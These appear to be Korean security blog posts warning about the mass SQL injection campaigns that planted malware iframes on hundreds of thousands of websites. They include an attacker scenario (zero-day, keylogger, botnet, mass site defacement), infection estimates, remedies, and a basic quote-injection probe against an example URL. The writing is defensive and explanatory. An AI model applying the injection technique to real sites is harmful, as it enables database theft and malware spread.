꾸준한 투자가 들어가야만 산업을 유지 할 수 있는데.. 이제는 이 것이 필수 인데.. 이 것을 인정하지 않는 기업이나 산업은 점차 쇄락할 수 밖에 없을 것 입니다.

이제부터는 보안이라는 측면은 최소한 IT 비지니스를 하는 회사에서는 가장 필수적인 중심요소입니다.

 

자료 참고 하세요.

 

 

Posted by 바다란

 

왜 상상하기 어려운 위협인가? - Digital pest!

  - 바다란

   * 초기 설명은  http://blog.naver.com/p4ssion/50031034464 여기를 참고 하세요.

 

왜 상상하기 어려운 위협인가? 상상하기 어려운 위협이라는 의미는 개별적인 서비스에 대한 공격에서 이제는 전역적인 대규모 서비스 공격으로 확산되고 있기 때문에 그러합니다. 더군다나 문제점들이 단기간에 개선될 가능성은 전혀 없으므로 앞으로도 전역적인 공격이 계속 될 것입니다. 상상하기 어려운 위협. 위협의 실현. 그리고 확산

 

그 동안 Web Application에 대한 공격은 지속적으로 되어 왔습니다. 그러나 최근에 발견된 공격 유형은 산발적인 공격이 아닌 대규모적인 공격을 의미합니다. 대규모적인 공격에 사용된 도구도 유추가 가능합니다.

아래 이미지 참고 하세요.

 

<ref : Attack structure 0804- made by p4ssion>

 

위의 이미지는 지난 몇 년 동안 공격 유형을 추적하면서 갱신한 공격의 흐름도 입니다. 여기에 새로 추가가 된 부분이 0번에 해당하는 내용입니다. 이제는 개별적인 Famous web service를 공격하는 것이 아니라 무작위적인 Target search 이후 공격이 이루어집니다. 공격 시에는 Google이나 기타 검색엔진을 통해 기본자료 추출 (특정 코드로 개발 ASP , 특정 DB 사용 MSSQL)을 통해 공격하는 기초적인 루틴이라 볼 수 있습니다. 무작위적인 Target search에는 전세계 모든 도메인에 대한 자료를 기반으로 공격을 하는 것도 예상 할 수 있습니다. 피해의 규모가 그 동안에는 특정 서비스에 방문하는 유저로 한정 되었다면 이제는 전 세계적인 확산 범위를 갖추고 있다고 보아야 됩니다.

 

공격대상: 전 세계의 Web service를 공격하여 악성코드를 확산

공격목표: 전 세계의 개인 Client PC에 대한 권한 획득 및 중요정보 탈취

 

위와 같은 전제에 가장 충실한 필요충분 조건이 완료 되었다고 볼 수 있습니다. 그 결과가 이번에 나타난 것이며 실제적으로는 조금 더 오래 되었다고 판단 합니다. 악성코드의 발전 방향에 있어서 보안이라는 부분은 전역적으로 이루어 지지 못하고 있습니다. 특정 국가에만 한정하여서도 전역적으로 이루어 지기 어려운 것이 현실이지만 이미 공격자는 전 세계의 영역을 범위에 두고 있습니다.

 

새로운 공격코드의 출현과 새로운 zeroday exploit의 출현은 피해를 기하급수적으로 늘릴 것입니다. 지금까지와 같은 몇 만대, 몇 십 만대의 규모가 아닌 몇 천만대를 기본으로 가지게 될 것입니다.

 

전 세계의 IT 산업 자체가 위험에 빠지게 된 것이라 할 수 있습니다. 특히 글로벌 서비스를 진행하는 금융 및 IT 서비스 업체에게는 직접적인 공격 대상이 될 수 있으며 위험성이 부가가 될 것입니다. 이 의미는 금전적인 관련이나 직접 거래가 발생 할 수 있는 모든 전자 상거래 부분에 있어서 중대한 위협의 출현과 동일합니다.

 

공격자의 예상대로의 시나리오를 대략적으로 유추하면 다음과 같습니다.

 

공격시나리오:

 

1.       신규 Zeroday exploit을 발견 혹은 구매 ( MS 운영체제가 가장 효율적이므로 MS 계열에 집중할 것이 당연함)

2.       Malware에 키보드 후킹 및 중요 사이트에 대한 접근 시 정보 탈취 코드 탑재

A.       S.korea 에서 발견된 DDos 가능한 Agent의 탑재 가능

B.       A항과 동일한 기능이지만 대규모 Botnet의 구성 가능

3.       Malware를 유포할 숙주 도메인에 코드 추가

A.       Malware를 유포하는 링크 도메인으로서 08.4월에 발견된 경우 처럼 1.htm ,1.js등의 코드로 특정 사이트 해킹 이후 해당 파일의 추가를 할 것임

B.       국가에 따라 수십에서 수백여 개의 링크 도메인을 확보 할 것임

4.       대규모 도메인 스캔도구를 활용 주요 도메인에 대한 악성코드 유포루틴 Add

A.       검색엔진 활용 또는 자체 보유한 도메인 리스트를 활용하여 순차적으로 공격을 시행

B.       공격 시 취약성이 발견되면  자동적으로 DB권한 획득 및 획득한 DB의 권한을 이용하여 웹 소스코드의 변조 시행

C.       현재 발견된 코드는 DB 테이블의 내용에 악성코드를 추가하는 루틴 이였으나 조금 더 코드가 갱신되면 충분히 웹페이지 소스코드에 교묘하게 위장하는 것이 가능함

5.       대규모로 유포된 악성코드를 활용한 금전적인 이득 취득

A.       특정 사이트에 대한 대규모 DDos 공격 현재 상태의 malware 유포 규모라면 대응 불가

B.       특정 온라인 게임 ( 세계적인 게임- Wow? ) 및 금융 관련 사이트에 대한 키보드 입력 후킹 ( 사용자의 정보 유출 )

                                     i.              온라인 게임 및 온라인 증권사에 대한 위험성이 높음 . 부수적인 인증 수단을 가지고 있는 경우 ( ex : otp , secure card )를 제외하고는 모든 대상에 대한 위험성 존재

 

* 4번 항목에서 발견된 악성코드 유포를 위한 웹사이트 변조가 08.4월에 발견된 카운트만 전 세계적으로 50만개의 개별 웹서비스(일부 중복 결과라 하여도 예상 결과는 변하지 않음)에 해당됩니다. 악성코드 유포 규모는 최소 천만 단위를 상회할 것으로 추정되며 Zeroday exploit에 따라 그 규모는 몇 십배로 늘거나 백만 단위 규모로 확대 될 것으로 예상됩니다.

 

위와 같이 시나리오가 예상됩니다. DB에 들어 있는 개인정보는 이미 우리 것이 아니죠. 한국뿐 아니라 전 세계 모든 내용이 마찬가지 입니다.

 

왜 상상하지 못할 위협인지 아무도 인지를 못하고 있습니다. 세계 어느 누구도 또 어떤 회사도 심각성에 대해서 그다지 인지를 못하고 있는 것으로 보입니다. 두렵습니다. 이젠 해결책도 제안 할 수 있는 범위를 넘어서 버렸습니다. 한국 내에서 발생하는 이슈들에 대해서도 몇 년 전부터 해결책을 직접 제안하고 다각도로 방안을 제시 했었는데 그 범주와 동일한 해결 방안들이 전 세계적으로 제안이 되어야만 가능한 상황이 되어 버렸습니다.

 

얼치기 Security product들만 또 근본 문제 해결 없는 땜빵 들만 전 세계적으로 출몰하게 생겼습니다. 안타까운 일입니다.

 

 

제품으로 해결될 부분은 없습니다. 단지 현 상태를 잠시 피할 수만 있을 뿐입니다. 근본적인 문제를 수정하지 않는 한 문제는 계속 될 수 밖에 없습니다. 근본 문제를 수정 한다는 것은 전 세계적인 Web Application 취약성 부분에 대해 수정이 되는 것을 의미합니다. 과연 가능할까요?

 

2005년에도 국가 전체적인 대응 방안을 제시한 적이 있습니다. 그 내용은 지금도 여전히 유효하며 지금부터 전 세계적인 영향력을 가집니다.

지금의 상황은 전체 Web Application의 위기이며 또한 IT산업 (장치산업 제외)의 위기입니다. 전 세계 거의 모든 Web application 개발 관련 서적에서 URL 인자에 대한 필터링을 강조하는 서적은 없습니다. 최근에 나온 Security 관련 개발서적 외에는 찾을 수가 없습니다. 이 문제는 앞으로도 계속됨을 의미합니다. 문제는 MS 관련 제품뿐 아니라 모든 Web 개발언어에도 동일하게 적용됩니다. 기대효과 측면에서 MS 제품에 대한 코드가 먼저 실현 된 것 뿐입니다.

 

문제의 근본원인은 SQL Injection XSS 취약성과 같은 Web application 소스의 필터링 부족 문제입니다. SQL Injection DB로 전달되는 인자에 대한 필터링 부족이 문제이며 XSS는 사용자 입력에 대한 특수문자 혹은 실행가능 스크립트에 대한 필터링 부족이 문제입니다. 모든 문제가 필터링에서 비롯되고 있습니다. 이후의 공격에 대한 차단은 별개 문제입니다. 중환자의 근본 원인을 제거하지 않고 부수적으로 나타나는 현상에만 집착을 하고 있습니다. 속에서는 암이 퍼지고 있는데 열이 난다고 밴드를 머리에 붙인 형국입니다. 이제 그 암은 전체에 영향을 미치는 범주로 확대 되었습니다. 밴드를 붙이고 해열제를 놓는다고 해결될 문제가 아닙니다. 근본 체질을 변경하고 지속적이고 꾸준한 노력만이 개선을 할 수 있습니다.  Pest는 이미 확산된 상황입니다. ( 여기서의 pest는 해충이 아닌 흑사병입니다. 치명적이므로..)

 

 

해결방안은 간단하면서도 어렵습니다.

 

1. Web application에 대한 취약성의 제거 제거를 위해서는 정확한 진단이 필요합니다. 현재 상용화된 Web app scanner로는 감당이 어렵습니다. Web security product에 대한 내용은 차후에 별도로 설명 합니다.  또한 제품의 가격도 만만치 않으며 지속적인 문제의 발견과 갱신이 어렵습니다. 한마디로 현재 상태로는 국소적인 혹은 여력 있는 기업들에서나 일부 주기적인 대응이 가능하나 문제는 계속 될 것으로 보입니다.

 

 - Web security 관련 scanner 제품이 효율성을 지니려면 다음과 같은 질문에 해답을 지니고 있어야 됩니다.

URL 수백 개 이상 혹은 그 이상의 도메인 리스트에 대해 짧은 시일 내에 효율적인 진단이 가능한 스캐너가 존재합니까?

대규모 연결구조를 가지는 도메인에 대한 효율적인 진단이 가능합니까?

웹 서비스의 개발속도는 빠르며  유지보수 횟수는 매우 많습니다. 매번 마다 효율적인 진단이 가능합니까?

웹서비스의 개발 비용 및 유지보수 비용 보다 낮은 비용으로 진단이 가능합니까?

수정 해야 될 코드 부분과 문제 발생 부분을 정확하게 직시 합니까?

 

여기에서 효율적인 진단이라는 의미는 최소한 공격도구보다 빠른 시간 내에  문제점을 찾아내는 것을 의미합니다. 도메인 하나당 최대한 1일을 경과 하여서는 효율성은 없다고 봐야 할 것입니다.

 

2. Malware 유포에 대응하기 위한 신속한 협의체 구성 주로 전 세계 백신 업체들

각 회사간의 이해관계로 어려움이 있을 것입니다. 그러나 전 세계를 대상으로 일관성을 가지고 유포되는 악성코드에 대한 대응에는 글로벌 보안 협의체가 필요하며 빠른 정보교환으로 사후 발생 문제를 최소화 하여야 합니다.

 

백신업체들 간에 대응책을 구비하려면 다음과 같은 질문이 필요합니다.

문제의 발생은 전역적으로 발생하고 있습니다만 해결책은 최초 발견 백신 범주에서만 제공 되고 있지 않습니까?

새로운 zeroday 유형의 백도어를 얼마나 발견하고 있습니까? ( system , web )

Heuristic method의 효율성은 얼마나 될까요? (오탐비율은 얼마나 줄었습니까? )

타 백신 개발사들과의 샘플 교환 및 정보 교류는 얼마나 활발 합니까?

 

3. 서비스 단위의 정보 유출의 방지를 위한 노력 키보드 후킹등에 의해 사이트 로그인 정보들이 노출 되지 않도록 End to End 단위의 암호화 전송 수준을 전체적으로 높여야만 합니다.  이 부분은 개별 기업들에서 진행을 하여야 하며 상당 수준의 노력이 필요하여 향후 어려움이 계속 될 부분입니다. 더불어 서구권역에서는 매우 힘들 것으로 보입니다.

 

키보드 입력부터 BHO (IE Plugin) -> 전송단계까지의 크게 3단계에 이르는 보안성을 완전하게 한 서비스 기업은 전 세계에 얼마나 될까요?

 

각 단위에 대한 해결책의 상세한 내용이나 전개는 이미 여러 해 전에 기술해 둔 바 있습니다. http://Blog.naver.com/p4ssion 에 올려둔 최근 발표자료를 참고 하시면 됩니다.

(IT 서비스의 현재 위험과 대응에 대하여- http://blog.naver.com/p4ssion/50024269739 )

 

 

세계적이며 전역적이고 포괄적인 대응책이 이루어 져야만 문제를 점차 줄여가고 해결 할 수 있습니다. ( 지구방위대라 불리는 상상의 기관이라도 동원 해야 가능할까요? )

 

저만 느끼는 공포였으면 했는데 이제는 눈 앞에 정체가 드러났네요. 어떤 식으로 풀어 갈 수 있을지 혼돈의 세상입니다.

 

Posted by 바다란

예고드린 대로 상상하기 어려운 위협에 대한 내용입니다. 두편 입니다. 호러물 정도 될 것 같습니다.

 

 

 

일전에 중국발 해킹이 전 세계로 확산 될 것을 예상 하였고 관련 내용들을 여러 번 공유를 한 적이 있습니다. 이제 실제적인 위협으로 직접 출현을 하고 있습니다. 국내는 2005년부터 일반적으로 발생 하였고 세계적으로 확대된 시기는 2006년 하반기쯤으로 예상을 하고 있습니다. 2007년에도 세계적으로 많은 이슈들이 생산 되었습니다. 올해 들어서는 더욱 드라마틱한 증가를 보이고 있는데 특이한 사항들이 눈에 드러나고 있습니다.

 

http://securitylabs.websense.com/content/Alerts/3070.aspx

http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9080580

 

위의 Websense 사의 조사 결과 이외에도 ( 위의 조사 결과는 google을 통한 동일 도메인 스크립트와 게시물의 링크만을 조회한 내용이며 실제적으로는 더욱 많은 피해가 있음은 당연한 이야기 입니다. 중복된 결과가 반영 된다 하여도 상상하기 힘든 수치입니다. ) 국내에서도 동일한 유형으로 조사를 한 결과 약 5만개 이상의 침입을 당한 사이트가 존재 하는 것이 확인 되었습니다.

http://www.boannews.com/media/view.asp?idx=9671&kind=0

 

위의 사안들에서 일반 사용자들은 물론이고 전문가들 조차도 오해와 잘못된 인식이 있는 부분들이 존재하고 있습니다. 이런 부분들에 대해서 정리하는 것도 필요하고 근본적인 원인 제거를 위해서는 어떤 것들이 필요한 지에 대해서 정리가 필요합니다.

 

 

 

상상하기 어려운 위협

 

 

실제화된 위협입니다.

상상하기 어려울 정도의 혼란이 다가 올 수도 있습니다. 이미 시작은 된 상태입니다.

위에 기사화된 내용이 전체를 나타내고 있지 않습니다. 확대 시키지도 않고 위에 나타난 내용대로만 기술을 해봅니다. 

 

50만대의 PC라 해도 규모가 엄청나다고 할 수 있는데 이건 PC가 아닙니다. 50만대의 웹서비스 입니다. 그렇다면 방문자를 곱하면 얼마나 될까요? 하루에 열명이 방문하는 정말 초라한 웹서비스라 할지라도 50 * 10 = 500만 입니다. 이미 인터넷상에 오픈 된지가 오래 되었으므로(10일 정도 노출을 추산) 여기에 또 * 10을 합니다. 5000만대의 개인 PC입니다.  정말 최소치로 잡은 내용입니다.  5000만대 중 정말 여유롭게 잡아서 스크립트에 포함된 공격코드가 실행이 안 되는 패치 설치자 및 다른 종류의 운영체제를 쓰는 사용자 비율을 40%로 보겠습니다. IE가 아닌 다른 브라우저의 사용자라 하여도 Windows 계열의 사용자들은 영향을 받습니다.

 

##########0*

<ref: http://en.wikipedia.org/wiki/Usage_share_of_web_browsers >

 

현재 Windows pc를 사용하는 일반 사용자의 비율은 90% 가량에 이릅니다.

<ref: http://en.wikipedia.org/wiki/Usage_share_of_desktop_operating_systems >

한국의 예가 아니라 전 세계적인 통계치의 예입니다.

 

거의 열에 아홉은 공격 대상자에 포함이 됩니다. 이중 패치를 설치한 사용자 비율을 30% 이상으로 산정하고 10% 가량을 해당 사항이 없는 운영체제로 보면 5000만대의 PC 60%에 달하는 개인PC들에 영향을 미침을 알 수 있습니다. 무려 3000만대 입니다.

 

보수적인 계산을 하였다는 가정입니다. 50만개의 웹사이트에 하루에 열명 정도의 방문자만 있고 노출 기간이 열흘이라고 산정 한 정말 최소의 결과라 할 수 있습니다.

 

l        일례로 Autoweb 이라는 회사도 공격의 대상이 되었습니다만 일일 방문자가 25000명 이라고 합니다. 10*10을 한 100명이 아니구요. 공격 대상이 얼마나 되었을지는 상상에 맡깁니다.

Ref: http://www.networkworld.com/news/2008/050108-autoweb.html 

 

위의 통계치에서 산출된 PC의 수치는 말 그대로 계산의 편리성을 위해 비약 없이 산정한 것이며 실제로는 이보다 더한 경우라고 판단 됩니다. 노출 기간은 앞으로도 상당기간 계속 될 수 밖에 없어서 문제는 더해질 수 밖에 없는 부분이죠.

 

 

 

 

왜 상상하기가 어려울만큼의 위협인가?

 

 

근본적인 문제를 지적 합니다.

 

50만대의 웹서비스에 악성코드를 설치하는 코드를 넣기 위해서는 전제 조건이 필요합니다.

해외의 기사 및 국내의 기사들도 이런 부분을 간과하고 있습니다. 심지어 전문가들 조차도...

 

 

l       문제의 시작은 필터링이 되지 않은 Web service의 코딩 문제

 

l       Database의 완전한 권한 획득 (이미 DB에 저장된 정보는 공격자의 것입니다.)

 

l       DB 권한을 통한 웹서비스 소스의 자유자재 변경 권한 (50만대의 웹서비스를 동시에 하나의 웹페이지로 변경하는 것도 가능하겠죠? 그러나 공격자들은 하지 않습니다.) 소스의 변경권한이 있어야 웹소스 내용에 악성코드를 유포하는 스크립트를 추가 하는 것이 가능합니다. 더불어 DB에 쓰기가 가능한 것도 마찬가지 이겠죠. 이건 시스템에 대한 완벽한 제어 기능과도 동일합니다.

   

 

위와 같은 세 개의 전제가 깔려 있습니다. 현상만을 논하기엔 문제가 많습니다. 50만대의 웹서비스 혹은 50만대의 개별 Database ( PC가 아닙니다. )에 저장된 정보의 유출, 또 최소한의 방문자에게도 유포되는 악성코드들의 파장 ( 위의 계산대로 최소화 하여 3000만대 이상의 수치입니다. ) 은 어디까지 미칠 수 있을까요?

 

현재의 공격코드는 지난 해에 패치가 나온 취약성을 공격하는 유형이지만 새로운 유형으로 변경이 된다면? 또 백신이나 보안소프트웨어에서 탐지가 어려운 Zeroday 유형이라면 어떤 결과가 초래 될까요?

 

키보드로부터 입력 되는 것들에 대한 로깅뿐 아니라 백도어 설치를 통한 원격제어 기능들까지도 이미 시현이 된 공격기술입니다. 폭넓은 Agent의 배포수단으로 웹서비스를 택한 것이고 이제는 무차별적인 웹서비스 공격이 시작도 아니고 발견된 것 뿐입니다.

 

Websense F-secure와 같은 보안 전문 회사들에서의 인식도 심각한 수준입니다.

너무 많은 iframe 삽입 루틴이 발견 되고 MS 계열의 웹 서비스 ( IIS + ASP + MSSQL)에서 발견이 되고 있으니 새로운 유형의 웜이나 공격코드가 미 발견된 MS의 취약성을 공격하는 것으로 오인을 하고 있습니다. 안타까운 인식입니다. 이런 유형의 오해는 공격에 대한 이해와 관찰부족으로 인합니다. 또한 종합적인 상황인식의 부족에서 기인합니다 

문제의 원인은 Web application 개발 시에 사용되는 모든 언어들 (php, asp, jsp, html, pl 등등 모든 종류)에서 Database로 전달되는 쿼리에 대해 유효한 쿼리 구문인지에 대한 필터링이 되지 않아서 발생하는 문제입니다. 이런 공격 근거를 몰라서 발생된 오해입니다. 

 

새로운 유형의 웜이나 공격코드가 발견이 된다면 이것은 MS의 취약성을 ( ref: http://www.news.com/8301-10789_3-9930452-57.html?tag=nefd.pop ) 공격하는 것이 아니라 URL의 인자를 DB로 전달하는 부분에서 SQL query에 대한 필터링을 하지 않아서 발생하는 문제입니다. 웜이라 하여도 이건 지능화된 Application 공격 유형의 웜 입니다.

 

 

SQL Injection의 설명

 

Web application을 개발하는 모든 개발언어들은 Database와 연결을 가집니다. 사용자의 선택에 따라서 DB에 저장된 다양한 컨텐츠를 웹페이지에 보여주는 형식을 지닙니다. 어떤 테이블에 몇 번째에 해당하는 데이터를 가져 오겠다고 정의하는 것이 Web app에서 사용하는 SQL 쿼리라고 할 수 있으며 쿼리의 조건은 사용자의 선택에 따라 선별 되게 됩니다. 간단하게  www.vuln.com/list.php?id=1&field=1100 과 같은 URL이 전달된다면 Web service 상에서는 Database에 다음과 같은 유형의 쿼리를 전달 합니다. Select * from Bulletin where tableid=1 and fieldid=1100 와 유사한 쿼리가 발생하게 되죠.

공격의 핵심은 이것에서 기인합니다. 만약 URL 인자에 SQL query를 덧붙이게 되면 어떻게 될까? 여기에서부터 기인을 하며 www.vuln.com/list.php?id=1&field=1100   과 같이 인자의 뒤에 문자 (인용부호)  붙이게 되면 SQL query는 구성상에 에러를 발생 시킵니다.

Select * from Bulletin where tableid=1’’ and fieldid=1100’’  와 같은 구성이 되며 이 경우에 Unclosed quotation mark error와 같은 DB의 에러 구문을 보내게 되죠.  Web 상에는 다양한 SQL Injection 관련된 설명들이 있습니다.  이런 유형들을 간단한 검색으로도 찾을 수가 있습니다.

Sql injection에 대한 간단한 설명: http://blog.naver.com/p4ssion/40017941957

대책에 대한 설명: http://blog.naver.com/p4ssion/40015866029

2005년에 이미 대책과 공격에 대한 위험에 대해서 알린 바가 있습니다.

 

 

위의 SQL injection에 대한 설명은 간단한 공격기법에 대한 설명입니다. 중요한 점은 수십~ 수백 번의 SQL 쿼리 어쩌면 그 이상의 공격 횟수가 필요합니다만 중국의 공격자들은 이와 같은 공격들을 자동화된 도구로 만들었다는 점입니다. 이미 3년도 전에 만들어진 상태입니다.

 

지금의 공격유형은 여기에 몇 가지 기능이 더 부가된 것으로 판단됩니다. 끔찍한 결과를 가져오는 내용이며 앞으로도 계속 유효할 내용입니다.

( 전 세계의 Web application을 각 인자 별로 Filtering을 완전하게 하거나 모든 DB와의 연결을 끊는 것이죠. 사실상 불가능합니다. )

 

문제에 대한 상세한 설명 및 부가적인 대책자료는 중복 내용이므로 자료를 참고 하시기 바랍니다.

http://blog.naver.com/p4ssion/40015866029 개별 시스템에 해당하는 대책이며 전체적이고 광역적인 대책은 별도 언급 하겠습니다.

 

 

 

- 다음편으로 계속 됩니다.

Posted by 바다란